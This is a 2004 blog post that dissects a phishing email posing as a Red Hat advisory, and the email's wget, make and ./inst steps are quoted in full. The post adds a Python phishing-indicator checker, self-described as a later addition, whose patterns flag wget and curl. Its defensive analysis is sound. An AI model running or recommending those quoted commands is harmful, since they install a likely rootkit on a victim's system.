Saturday, October 23, 2004


Redhat Phish


Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:


[Red Hat logo image]

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

  • First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
  • Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.


Very credible looking, except for a few little niggles:

  • Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) personal web space on a Stanford server, not to a Redhat host, and the instructions have you build it and run ./inst yourself (presumably as root, since it is supposed to replace ls and mkdir). Redhat ships fixes as signed RPM packages, not as a tarball you compile by hand.
  • I seriously doubt that Redhat would be relaying through a random machine in Taiwan. Note also the “unknown” in the Received line: the relay’s IP address had no reverse DNS that Postfix could verify:
    Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)
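The niggles above are exactly the checks a mail filter can make mechanically. The following script is an added example for this post (it is not code from the original page): it parses the Received chain, pulls download URLs out of the body, and flags an off-vendor relay, a relay with unverified reverse DNS, an off-vendor or ~user download host, and instructions to fetch, build and run code by hand. The phish sample is constructed from the Received line and body quoted above; its From:/To:/Subject: headers, the clean control message (hostname and RFC 5737 test IP are placeholders) and the vendor domain list are assumptions.

```python
"""Flag the phishing indicators called out in the post.  Added example, not
part of the original page; the sample messages are constructed (see below)."""
import email
import re
from email import policy

# Assumption: domains a genuine Red Hat advisory would be sent from or link to.
VENDOR_DOMAINS = ("redhat.com",)

# Postfix-style Received clause: "from HELO (rDNS [IP])"
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S*)\s*\[([0-9.]+)\]\)", re.I)
# URL with a path, with or without a scheme (the phish writes it bare).
URL_RE = re.compile(r"\b(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})(/[^\s'\"<>]*)")
# Lines that tell the reader to download, unpack, build or execute something.
EXEC_RE = re.compile(r"^\s*(?:wget|curl|tar|make|\./\S+|sh\s)", re.M)

# Constructed sample: Received line and body lines are as quoted in the post;
# the From:/To:/Subject: headers are assumed.
PHISH_MAIL = """\
Received: from mail.forcartex.com.tw (unknown [211.22.18.59])
\tby samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39
\tfor <daddy@freeke.org>; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)
From: RedHat Security Team <security@redhat.com>
To: daddy@freeke.org
Subject: fileutils vulnerability

Dear RedHat user,

First download the patch from the Stanford RedHat mirror:
wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst
"""

# Constructed control: relayed from the vendor, no download link.  The host
# name and the IP (RFC 5737 test range) are placeholders, not real Red Hat MXs.
CLEAN_MAIL = """\
Received: from mx.redhat.com (mx.redhat.com [192.0.2.10])
\tby samantha.freeke.org (Postfix) with ESMTP id 000000000000
\tfor <daddy@freeke.org>; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)
From: security@redhat.com
To: daddy@freeke.org
Subject: constructed clean advisory

Updated packages are available through up2date.
"""


def parse_received(msg):
    """One dict per Received header, in header order (newest hop first)."""
    hops = []
    for hdr in msg.get_all("Received", []):
        m = RECEIVED_RE.search(" ".join(str(hdr).split()))  # unfold the header
        if m:
            hops.append({"helo": m.group(1), "rdns": m.group(2), "ip": m.group(3)})
    return hops


def in_domain(host, domains):
    """True if host is one of the domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def check_advisory(raw, vendor_domains=VENDOR_DOMAINS):
    """Return a list of human-readable findings; an empty list means nothing odd."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    hops = parse_received(msg)
    if hops:
        origin = hops[-1]  # bottom-most Received = the hop closest to the sender
        if not in_domain(origin["helo"], vendor_domains):
            findings.append(f"origin relay {origin['helo']} [{origin['ip']}] "
                            f"is not under {', '.join(vendor_domains)}")
        if origin["rdns"].lower() == "unknown":
            findings.append(f"origin IP {origin['ip']} has no verified reverse DNS")

    part = msg.get_body(preferencelist=("plain",))
    body = part.get_content() if part is not None else ""

    for host, path in URL_RE.findall(body):
        url = host + path
        if not in_domain(host, vendor_domains):
            findings.append(f"download URL {url} is hosted off-vendor on {host}")
        if "/~" in path:
            findings.append(f"download URL {url} points at a personal (~user) web account")

    if EXEC_RE.search(body):
        findings.append("body tells the reader to fetch, build and run unsigned code by hand")

    return findings


if __name__ == "__main__":
    for name, raw in (("phish", PHISH_MAIL), ("clean", CLEAN_MAIL)):
        print(name)
        for finding in check_advisory(raw) or ["no findings"]:
            print("  -", finding)
```

The relay check reads the bottom-most Received header because that is the hop your own MTA did not write; anything above it was added by servers you trust more. The domain match is suffix-based on whole labels, so a host like redhat.com.example.net does not pass as the vendor.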

Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ’nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail — the HTML pulls Redhat’s real logo straight from a Redhat server, and they even ran their HTML through Tidy!

Let’s be careful out there!


:: Dave Walker 23:55 (EST/EDT) [+]

:: [/tech/computers/security]
:: tags:

:: Comments (3)


Eating A Bagel, Posting


You wouldn’t believe (OK, actually, you probably would) how much low level BS it took to get the wireless card working in Linux on this silly Dell (short version: Broadcom is the devil), but the payoff is that I’m posting this entry from a nearby Panera (yay for free wireless) while having hot chocolate and a ridiculously tasty cinnamon crunch bagel. I guess that makes this my first ever moblog post… Next step — pictures.


:: Dave Walker 11:38 (EST/EDT) [+]

:: [/tech/computers/os/linux]
:: tags:

:: Comments (2)




Credit ... is the only enduring testimonial to man's confidence in man. -- James Blish